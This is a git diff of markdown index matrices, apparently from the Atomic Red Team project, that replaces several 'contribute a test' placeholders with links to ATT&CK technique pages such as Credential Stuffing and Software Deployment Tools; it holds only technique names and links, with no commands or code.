-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -39,7 +39,7 @@
 |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Trap](../../T1546.005/T1546.005.md) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) |  | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  |  |  | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 558cd917..06b1e02f 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -6,11 +6,11 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -18,9 +18,9 @@
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+|  | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -30,7 +30,7 @@
 |  | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -43,7 +43,7 @@
